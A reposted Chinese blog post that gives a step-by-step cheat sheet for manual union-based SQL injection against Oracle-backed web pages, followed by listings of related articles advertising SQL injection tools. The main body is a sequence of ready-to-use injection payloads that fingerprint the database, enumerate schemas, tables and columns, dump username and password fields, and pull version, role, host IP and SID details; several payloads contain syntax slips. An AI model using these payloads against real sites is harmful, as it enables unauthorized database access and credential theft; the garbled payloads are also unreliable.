oracle union注入

最新推荐文章于 2024-04-12 13:04:35 发布
最新推荐文章于 2024-04-12 13:04:35 发布
阅读量607 收藏
点赞数 1
原文链接:https://blog.csdn.net/pygain/article/details/52763126
版权
原创

SQL注入--Oracle

2016-10-09 20:34:03 阅读数 873 更多
分类专栏: 渗透测试

1.判断是否为oracle数据库

id=88 and exists(select *from dual)

id=88 and exists(select *from user_tables)这两个表都是系统表,返回正常则为oralce数据库


2.查询字段数

order by 4 异常

order by 3 正常   最大列数为3


3.判断字段类型

id=88 union select null,null,null from dual 判断这三个列是否有类型异常,返回正常则继续

id=88 and 1=2 union select 'ss',null,null/null,'ss',null/null,null,'ss'  返回正常判断哪个列数为字符型 可用来显示查询结果


4获取所有数据库的名字(假设第二位为字符型)

id=88 and 1=2 union select null,(select global_name from global_name),null from dual

id=88 and 1=2 union select null, (select sys.database_name from dual),null from dual

id=88 and 1=2 union select null,(select name from v$database),null from dual  几个特殊的库的名字

id=88 and 1=2 union select null,(select owner from all_tables where rownum=1),null from dual

id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一个库名' and rownum=1),null from dual

id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一库名'and owner <>'第二个库名'and rownum=1),null from dual

每次查询将前面的库排除掉


5.获取当前库的所有表

id=88 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual

id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一个表名'rownum=1),null from dual

id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一个表名'and table_name<>'第二个表名' and rownum=1),null from dual


6.查询表的字段名

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名'and rownum=1),null from dual

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一个字段名’and rownum=1),null from dual

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一个字段名’ and column_name<>'第二个字段名'and rownum=1),null from dual


7.查询字段值

id=88 and 1=2 union select null,username,password from '表名字'--


8.其他重要信息

null,(select banner from sys.v_$version where rownum=1)数据库版本

null,(select * from session_roles where rownum=1)当前用户权限

null,(select name from v$database) 数据库名

null,(select table_name from user_tables where rownum=1)当前库所有表

null,(select member from v$logfile where rownum=1)服务器系统

null,(select utl_inadder.get_host_address from dual)服务器监听IP

null,(select instance_name from v$instance)数据库SID


0 个人打赏
文章最后发布于: 2016-10-09 20:34:03
bylfsj
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap注入工具
09-20
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4)联合查询注入,可以使用union的情况下的注入。 5)堆查询注入,可以同时执行多条语句的执行时的注入。 比较实用的sql注入工具
超级SQL注入工具
04-08
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,相比C#自带的HttpWebRequest速度提升2-5倍。 超级SQL注入工具支持盲注环境获取世界各国语言数据,直接秒杀各种注入工具在盲注环境下无法支持中文等多字节编码的数据。 工具特点: 1. 支持任意地点出现的任意SQL注入 2. 支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3. 支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4. 依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。 程序运行需要安装. Net Framework 2.0。运行环境Win7,Win8环境已测试,其他环境请自测。 注意:使用本工具,需要对SQL注入有一定了解。
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,相比C#自带的HttpWebRequest速度提升2-5倍。 超级SQL注入工具支持盲注环境获取世界各国语言数据,解决了各种常见注入工具在盲注环境下无法支持中文等多字节编码的数据。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
穿山甲pangolinSQL注入工具
11-05
1、多方位的数据库支持,MS SQL 、Oracle 、Mysql 、Access 、PostgreSQL 、DB2 、Sybase、Informix 、Sqlite等。 2、内容大小判断方法能够减少网络数据流量。 3、自动关键字分析能够减少人为操作且更判断结果准确。 4、最大化的Union操作能够极大的提高SQL注入操作速度。 5、代理支持,注入站(点)管理功能。 6、预登陆功能,在需要验证的情况下照样注入。 7、自定义HTTP标题头功能。 8、丰富的绕过防火墙过滤功能。 9、支持HTTPS,数据导出功能。
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
SQL注入--Oracle
pygain的博客
10-09 1495
1.判断是否为oracle数据库 id=88 and exists(select *from dual) id=88 and exists(select *from user_tables)这两个表都是系统表,返回正常则为oralce数据库 2.查询字段数 order by 4 异常 order by 3 正常   最大列数为3 3.判断字段类型 id=88 unio
sql注入oracle(1)
qq_43423320的博客
03-16 1783
sql注入oracle 1. 判断为oracle and exist (select * from dual ) 或者and (selecr count(*) from user_tables)>0 -- 2. 获取基本信息 (1) 获取字段数 order by N (2) 获取数据库版本 and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual (3)获取数据库连
【sql注入-union注入union函数 联合注入
07-11 7259
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1097
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
Oracle数据库注入
weixin_50464560的博客
08-06 1485
0x01 前言 在渗透测试过程中,总是遇到不熟悉的数据库,知道了有SQL注入漏洞但是无法利用,这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的,当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰,无法成功利用。故学习了Oracle数据库注入的相关知识,在此总结分享给大家,希望能够对安全从业人员有所帮助。 全文基于对于SQL注入具有一定理解,并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注...
Oracle SQL注入技术
04-03
包含三个pdf文件: 1、JSP+Oracle的SQL注入 .pdf 2、Oracle SQL注入.pdf(讲解dbms包的非法使用过程) 3、Oracle数据库中SQL注入攻击的检测与防御.pdf(一篇学术性文章)
干货 Oracle注入和漏洞利用姿势总结
最新发布
2401_84187635的博客
04-12 371
if ‘SMITH’ in res.text: # 为真时,即判断正确的时候的条件。(img-kmpW0H3S-1712898206497)](img-WvSzEJXT-1712898206497)](img-gC5fie7O-1712898206498)](img-lNMktoxz-1712898206498)]到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。– 授予相关 Java 权限。– 撤销相关 Java 权限。– 发起 HTTP 请求。– 发起 DNS 请求。
看了这个,谁还怕Oracle注入?
3569
06-02 1618
https://www.secquan.org/Prime/1069599 https://mp.weixin.qq.com/s/MYkvQDpYZbz67F6qK9Ri0g 微信可能图片不能直接显示,我也木得办法 ~ Mark一下 ~ 目录 1. Oracle联合注入总结 2. Oracle报错注入总结 3. Oracle基于布尔的盲注总结 4. Oracle基于延时的盲注总结 ...
网络安全进阶学习第十五课——Oracle SQL注入
p36273的博客
08-08 1608
Oracle数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。Oracle服务默认端口:1521Oracle和MySQL数据库语法大致相同,结构不太相同。最大的一个特点就是oracle可以调用Java代码。Oracle要求select … from 后必须要有查询的表名。
oracle中的集合查询 union(并)interact(交)except(差)
weixin_46093984的博客
09-22 3087
数据库中的集合操作union、intersect、minus unionunion all的区别(面试题) 含图解
Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
T1ngSh0w的博客
09-08 1519
Oracle数据库注入-墨者学院-SQL手工注入漏洞测试(Oracle数据库)详细讲解
SQL注入(Oracle显错注入)---zkaq
weixin_38237216的博客
04-11 1125
1.概念 1.oracle数据库特点:很死板 ,非常讲究语法格式 2.dual:dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,dual表实际作用只是为了满足oracle数据库的语法格式 3.特点:没有database()函数,没有limit用法。 4.常用的语句 select * from all_tables 查询出所有的表 select * from user_tables 查询出当前用户的表 select*from all_tab_columns 查询出
Oracle SQL 注入
prahs的专栏
07-14 8819
Oracle SQL 注入本文主要总结在Oracle注入中的步骤方法和注意事项: 参考了:http://www.freebuf.com/articles/web/5411.html 注入常用语句 常用步骤 注意事项 常用步骤1 找注入点 用单引号’之类的触发报错 用or 1=1, or 1=2之类的观察反馈 2 判断数据库类型 oracle 支持– 类型注释,但是不支持;分隔执行多语句,orac
SQL注入oracle注入+SQLbypass+sqlmap实战
2301_80661529的博客
02-21 1010
Oracle数据库是全球最知名的关系型数据库管理系统(RDBMS)之一,由美国甲骨文公司(Oracle Corporation)开发并维护。作为企业级数据管理解决方案的市场领导者,Oracle数据库在可靠性、安全性、可伸缩性和性能方面具有卓越表现,被广泛应用于各类关键业务场景,包括金融、电信、政府和大型企业的各种复杂应用。**核心特性:**
oracle union
05-26
UNIONOracle SQL 中的一个关键字,用来将两个或多个 SELECT 语句的结果集合并成一个结果集。UNION 操作符会自动去除重复的行,如果想保留重复行可以使用 UNION ALL。下面是一个 UNION 的示例: ``` SELECT column1, column2 FROM table1 UNION SELECT column1, column2 FROM table2; ``` 这个示例会将 table1 和 table2 中的 column1 和 column2 列的数据合并成一个结果集,并去除重复的行。如果想保留重复的行,可以将 UNION 替换为 UNION ALL: ``` SELECT column1, column2 FROM table1 UNION ALL SELECT column1, column2 FROM table2; ``` 这个示例会将 table1 和 table2 中的 column1 和 column2 列的数据合并成一个结果集,并保留重复的行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值